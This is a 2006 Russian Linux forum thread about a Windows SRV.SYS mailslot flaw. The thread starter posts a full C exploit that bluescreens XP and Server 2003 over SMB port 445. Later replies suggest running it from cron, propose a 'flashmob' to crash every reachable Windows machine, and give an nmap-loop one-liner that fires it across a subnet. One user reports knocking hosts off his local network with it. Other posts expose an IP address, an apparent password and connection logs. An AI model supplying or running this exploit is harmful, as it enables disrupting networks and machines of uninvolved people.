LINUX.ORG.RU
ФорумTalks

наткнулся случайно на свежую уязвимость в Виндах..


1

0

http://www.securitylab.ru/vulnerability/271329.php уязвимость довольно стандартная..но респект, тому, кто откапал )) ..там прилагается эксплойт, под винду - я его портанул под линукс just for fun, так что если кому лень самому переписывать - обращайтесь.

Сабж кладет 100% XP и 2003.

★★★★★

> так что если кому лень самому переписывать - обращайтесь.

Выкладывай давай :)

JB ★★★★★
()
Ответ на: комментарий от JB

//данный код распространяется по лицензии GPL, только для
//тестирования на безопасность.
#include <stdio.h>
#include <sys/socket.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>

unsigned char SmbNeg[] =
"\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";

unsigned char Session_Setup_AndX_Request[]=
"\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
"\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
"\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
"\x62\x00";

unsigned char TreeConnect_AndX_Request[]=
"\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
"\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
"\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
"\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
"\x3f\x00";

unsigned char Trans_Request[]=
"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";


unsigned char recvbuff[2048];

void neg ( int s ){
char response[1024];
memset(response,0,sizeof(response));
send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
}

int main(int argc,char **argv){
if(!argv[1]){
printf("\nplease enter target Ip address\n\n");
return;
}
struct sockaddr_in server;
int sock;
int ret;
int userid,treeid;

sock = socket(AF_INET,SOCK_STREAM,0);
if(sock<=0){
return -1;
}
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr(argv[1]);
server.sin_port = htons(445);

ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
if (ret==-1){
printf("connect error!\n");
return;
}
neg(sock);
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
if (ret<=0){
printf("send Session_Setup_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
userid=*(int*)(recvbuff+0x20); //get userid
memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
if (ret<=0){
printf("send TreeConnect_AndX_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
treeid=*(int *)(recvbuff+0x1c); //get treeid

memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid

ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
if (ret<=0){
printf("send Trans_Request error!\n");
return;
}
recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
close(sock);
return 0;
}

dreamer ★★★★★
() автор топика

Вот вам уязвимость в венде: делаешь Scan Disk на USB External Hard Drive. Посреди процесса выдергиваешь диск. Венда ускоренно пройдет оставшиеся минуты теста и скажет "Disk is okay" Вот так она может прочитать мысли диска...

Krechet
()
Ответ на: комментарий от Xellos

кстати, о кривости Венды -
потестировав сабж, решили попробовать обновить тачку с виндой, скачать паки всякие с microsoft.com. На тачке стоит обычная XP_SP2, есть ключ... вобщем стали активировать, а она говорит, что типа ключ -
неверный )), 2 ключа попробовали - не получается...хотя ключи ест-но правильные (покупные) - вот вам и клюик винды.

dreamer ★★★★★
() автор топика
Ответ на: комментарий от LeX

/me с ужасом думает, что будет, если в наших сетях запустить что-от вроде -
for i in `cat ip_list`;do exploit $i;done

пол-города умрет.

dreamer ★★★★★
() автор топика

ну теперь венде точно песец )))

Komintern ★★★★★
()
Ответ на: комментарий от dreamer

Может даже больше чем полгорода...
Ждем в ближайшее время кучу сообщений на всяких форумах типа "Помагите! Винда глючит!!!1"
Интересно, а если на винде остановить службу Server и заткнуть фаером 445-й порт это спасет?

Deleted
()

Пора DDoS-ить батарейкина, а то толксы опять слоем чуши покроются :)

Ramen ★★★★
()
Ответ на: комментарий от Deleted

>Интересно, а если на винде остановить службу Server и заткнуть
>фаером 445-й порт это спасет?

да. проверено. собсно тогда просто не удасться забиндиться на порт..
и еще раз напоминаю - уязвимость конкретно в драйвере SRV.SYS службы Server при обработке Mailslot сообшений. Та еще есть потенциальная возможность выполнения произвольного кода...но я пока не копался..

dreamer ★★★★★
() автор топика

я тут подумал :)) - а это хороший повод для линукса, очень удачно можно подвести под это дело тезис о том, что Винда очень небезопасная
система(это так и есть, но одно дело слова, а другое - BSoD перед глазами начальства), а Linux - очень секьюрная и стабильная ось..

Вобщем, предлагаю всем анонимусам, поставить сабж в крон и через некоторое время о Венде никто и не вспомнит )), если конечно микрософт оперативно не закроет дыру..

dreamer ★★★★★
() автор топика
Ответ на: комментарий от dreamer

>Вобщем, предлагаю всем анонимусам, поставить сабж в крон и через некоторое время о Венде никто и не вспомнит ))

Ну вспомни эпидемию msblast... никто про винду не забыл, скорее наоборот юзеры в процессе излечения/переустановки системы еще больше к ней привязались =) такой вот психологический эффект =)

Deleted
()
Ответ на: комментарий от Lumi

>я тут подумал :)) - а это хороший повод для линукса, очень удачно можно подвести под это дело тезис о том, что Винда очень небезопасная
система(это так и есть, но одно дело слова, а другое - BSoD перед глазами начальства), а Linux - очень секьюрная и стабильная ось..

Нам тогда Debian припомнят и 2 локальных root'а :)

Belt
()
Ответ на: комментарий от Belt

локальный рут - это намного менее страшная брешь, да и к тому же ии сразу же закрыли.

dreamer ★★★★★
() автор топика

А может флешмоб? Скажем, завтра в 20:00 по Москве кладем все виндовые компы, до которых можем дотянуться по сети, в Синий Экран (или что там с ними происходит).

Deleted
()
Ответ на: комментарий от Deleted

там появляется BSOD или ребут, на выбор.

чур я учавствовать не буду, ибо меня уволят сразу :))
кстати, есть предположение, что в журналах событий у винды не отображается IP атакующего и даже сама попытка коннекта, т.к. просто не успевает :))

dreamer ★★★★★
() автор топика
Ответ на: комментарий от Krechet

>Вот вам уязвимость в венде: делаешь Scan Disk на USB External Hard Drive. 
>Посреди процесса выдергиваешь диск. Венда ускоренно пройдет оставшиеся 
>минуты теста и скажет "Disk is okay" Вот так она может прочитать мысли диска...

А уязвимость, как эксплуатировать можно, кроме, как виндузятников удивлять?

ЗЫ
А Мелкософт, что на это говорит?

ManJak ★★★★★
()

Поэкспериментировал с XP в vmware.

Для работы эксплойта требуется активная "служба доступа к файлам и принтерам" и фаервол отключенный или разрешающий "удаленный доступ к файлам и принтерам".

Умирает мгновенно, сразу в синий экран уходит, вот только эксплойт подвешивается, нужно по Ctrl-C отрубать, так что в цикле сетку повесить не получится :-)

AngryElf ★★★★★
()
Ответ на: комментарий от Deleted

>Интересно, а если на винде остановить службу Server и заткнуть фаером 445-й порт это спасет?

$ cat /etc/services | grep  445
microsoft-ds    445/tcp                         # Microsoft Naked CIFS
microsoft-ds    445/udp

Прикольно!
Это их ДС! 

ManJak ★★★★★
()
Ответ на: комментарий от ManJak

Кстати, эти упыри все знали =) Звучит красиво:

Microsoft Naked CIFS

HINT: naked!!!

ManJak ★★★★★
()
Ответ на: комментарий от Belt

Ща, народ проверяет, у меня винды нет, может и удаленная =(

ManJak ★★★★★
()
Ответ на: комментарий от ManJak

Ты вроде бы ко мне в профиль заглядывал, а такие вопросы задаёшь...

ppp0 Link encap:Point-to-Point Protocol
inet addr:213.135.131.59 P-t-P:213.135.128.74 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1

Lumi ★★★★★
()
Ответ на: комментарий от ManJak

Так у меня в профиле город вписан :)

Lumi ★★★★★
()

Ой!.. Сорри...

А оно упало...

А сама программулина у меня не завершается, но жертвы падають.

ip1981 ☆☆
()
Ответ на: комментарий от Lumi

Тем более, что это фигня =)

$ssh 10.1.1.9
...
$ su
Password:
# zcat /var/log/messages.1.gz | grep -i pppd
Aug  1 12:05:21 p200mmx pppd[19613]: LCP terminated by peer
Aug  1 12:05:21 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:05:21 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:05:24 p200mmx pppd[19613]: Connection terminated.
Aug  1 12:05:24 p200mmx pppd[19613]: Connect time 713.7 minutes.
Aug  1 12:05:24 p200mmx pppd[19613]: Sent 2118229 bytes, received 10918263 bytes.
Aug  1 12:05:45 p200mmx pppd[19613]: PPP session is 2888
Aug  1 12:05:45 p200mmx pppd[19613]: Using interface ppp0
Aug  1 12:05:45 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  1 12:05:45 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:05:45 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:05:45 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:05:46 p200mmx pppd[19613]: PAP authentication succeeded
Aug  1 12:05:46 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  1 12:05:46 p200mmx pppd[19613]: local  IP address 89.110.9.172
Aug  1 12:05:46 p200mmx pppd[19613]: remote IP address 89.110.8.1
Aug  1 12:16:17 p200mmx pppd[19613]: LCP terminated by peer
Aug  1 12:16:17 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:16:17 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:16:20 p200mmx pppd[19613]: Connection terminated.
Aug  1 12:16:20 p200mmx pppd[19613]: Connect time 10.6 minutes.
Aug  1 12:16:20 p200mmx pppd[19613]: Sent 4613 bytes, received 5168 bytes.
Aug  1 12:16:25 p200mmx pppd[19613]: PPP session is 2920
Aug  1 12:16:25 p200mmx pppd[19613]: Using interface ppp0
Aug  1 12:16:25 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  1 12:16:25 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:16:25 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:16:25 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:16:25 p200mmx pppd[19613]: PAP authentication succeeded
Aug  1 12:16:25 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  1 12:16:25 p200mmx pppd[19613]: local  IP address 89.110.11.4
Aug  1 12:16:25 p200mmx pppd[19613]: remote IP address 89.110.8.1
Aug  1 12:21:56 p200mmx pppd[19613]: LCP terminated by peer
Aug  1 12:21:56 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:21:56 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:21:59 p200mmx pppd[19613]: Connection terminated.
Aug  1 12:21:59 p200mmx pppd[19613]: Connect time 5.6 minutes.
Aug  1 12:21:59 p200mmx pppd[19613]: Sent 6402 bytes, received 4184 bytes.
Aug  1 12:22:04 p200mmx pppd[19613]: PPP session is 2937
Aug  1 12:22:04 p200mmx pppd[19613]: Using interface ppp0
Aug  1 12:22:04 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  1 12:22:04 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  1 12:22:04 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:22:05 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  1 12:22:05 p200mmx pppd[19613]: PAP authentication succeeded
Aug  1 12:22:05 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  1 12:22:05 p200mmx pppd[19613]: local  IP address 89.110.11.155
Aug  1 12:22:05 p200mmx pppd[19613]: remote IP address 89.110.8.1
Aug  2 00:22:09 p200mmx pppd[19613]: LCP terminated by peer
Aug  2 00:22:09 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  2 00:22:09 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  2 00:22:12 p200mmx pppd[19613]: Connection terminated.
Aug  2 00:22:12 p200mmx pppd[19613]: Connect time 720.1 minutes.
Aug  2 00:22:12 p200mmx pppd[19613]: Sent 12500070 bytes, received 9074343 bytes.
Aug  2 00:22:17 p200mmx pppd[19613]: PPP session is 4924
Aug  2 00:22:17 p200mmx pppd[19613]: Using interface ppp0
Aug  2 00:22:17 p200mmx pppd[19613]: Connect: ppp0 <--> nas0
Aug  2 00:22:17 p200mmx pppd[19613]: Couldn't increase MTU to 1500
Aug  2 00:22:17 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  2 00:22:17 p200mmx pppd[19613]: Couldn't increase MRU to 1500
Aug  2 00:22:17 p200mmx pppd[19613]: PAP authentication succeeded
Aug  2 00:22:17 p200mmx pppd[19613]: peer from calling number 00:90:1A:41:FB:7A authorized
Aug  2 00:22:17 p200mmx pppd[19613]: local  IP address 89.110.11.84
Aug  2 00:22:17 p200mmx pppd[19613]: remote IP address 89.110.8.1

А это АДСЛ

ManJak ★★★★★
()
Ответ на: комментарий от dreamer

Не бывает на моей машине рутового пароля, всем до завтра. :)

Lumi ★★★★★
()
Ответ на: комментарий от dreamer

89.110.8.6
ghfhryti
Сломай!
Это, как раз на том ИП, который ты видишь!
12 часов будет висеть, потом сменю, точнее ИП сменят, еще точнее все сменим

ManJak ★★★★★
()
Ответ на: комментарий от ManJak

Для доказательства: lcat restore Из хомы сюда

ManJak ★★★★★
()
Ответ на: комментарий от ManJak

а чего там ломать )), пусть ломают красноглазые анонимусы.

dreamer ★★★★★
() автор топика

Блэкдаун в локалке

for i in `nmap -sP 192.168.0.0/16 | cut -f 2 -d "(" | cut -f 1 -d ")"`; do ( (./winfuck $i)& sleep 2; kill ${!}; )& sleep 0.1; done;

Deleted
()
Ответ на: комментарий от AngryElf

Хехе

[elf@elf (~)]$ cat ips5

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-08-02 20:44 EEST
Host 192.168.50.4 appears to be up.
Host 192.168.50.6 appears to be up.
Host 192.168.50.9 appears to be up.
Host 192.168.50.10 appears to be up.
Host 192.168.50.11 appears to be up.
Host 192.168.50.15 appears to be up.
Nmap finished: 256 IP addresses (6 hosts up) scanned in 8.945 seconds
[elf@elf (~)]$ cat ips52

Starting Nmap 4.01 ( http://www.insecure.org/nmap/ ) at 2006-08-02 20:45 EEST
Host 192.168.50.1 appears to be up.
Host 192.168.50.11 appears to be up.
Host 192.168.50.15 appears to be up.
Nmap finished: 256 IP addresses (3 hosts up) scanned in 2.262 seconds


первый файл - до, второй - после :)

И вот почему-то никаких угрызений совести...

AngryElf ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.